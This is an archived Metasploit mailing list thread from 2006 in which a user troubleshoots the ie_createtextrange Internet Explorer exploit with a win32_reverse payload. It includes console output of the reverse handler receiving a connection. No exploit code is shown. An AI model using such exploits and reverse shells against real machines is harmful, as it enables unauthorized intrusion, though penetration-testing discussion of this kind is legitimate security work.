Metasploit mailing list archives

ie_createtextrange

From: sebastian.funk at gmail.com (Sebastian Funk)
Date: Tue, 4 Apr 2006 14:19:21 +0200

Hi,

On Apr 3, 2006, at 11:29 PM, mmiller at hick.org wrote:

On Mon, Apr 03, 2006 at 09:05:33PM +0200, Sebastian Funk wrote:

Hi,

I tried the "ie_createtextrange"-exploit, and in some trys it worked
just fine. But with one computer (Win XP and AntiVirGuard) it
suddenly doesn't. I get this back:

     msf ie_createtextrange(win32_reverse) > exploit
     [*] Starting Reverse Handler.
     [*] Waiting for connections to http://192.168.2.100:8080/
     [*] Client connected from 34.158.237.102:2455 (Windows).
     [*] Got connection from 192.168.2.100:80 <-> 34.158.237.102:2456

     [*] Exiting Reverse Handler.


If this happens, it may mean that cmd.exe failed to execute (but that
the reverse connect succeeded).

What reasons could that have? It's reproducible and happens only on  
that one machine.

  Alternatively, it may mean that
something other than the payload connected to the listener for the
reverse connection.  Do you see exiting reverse handler right when  
'Got
connection' shows up?

No, I don't. It's the same IP that connected to 80 as to 8080.

Greetings,
Sebastian

Current thread:

ie_createtextrange Sebastian Funk (Apr 03)
- ie_createtextrange mmiller at hick.org (Apr 03)
  - ie_createtextrange Sebastian Funk (Apr 04)